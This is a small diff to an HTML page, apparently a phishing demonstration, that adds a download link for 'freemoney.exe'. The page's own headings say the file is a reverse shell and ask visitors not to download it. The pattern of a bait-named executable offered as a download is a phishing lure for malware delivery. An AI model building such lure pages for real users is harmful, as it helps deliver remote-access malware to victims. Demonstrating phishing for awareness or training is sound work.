--- a/index.html
+++ b/index.html
@@ -21,7 +21,9 @@ a:visited {
         <h2 style="color:white">The download file is a reverse shell, this website is a phishing delivery method.</h2>
         <h3 style="color:white">Please don't download the file.</h3>
 
-        
+        <a href="freemoney.exe" download>
+            <img src="freemoney.exe" alt="freemoney">
+        </a>
 
     </body>
     <footer>
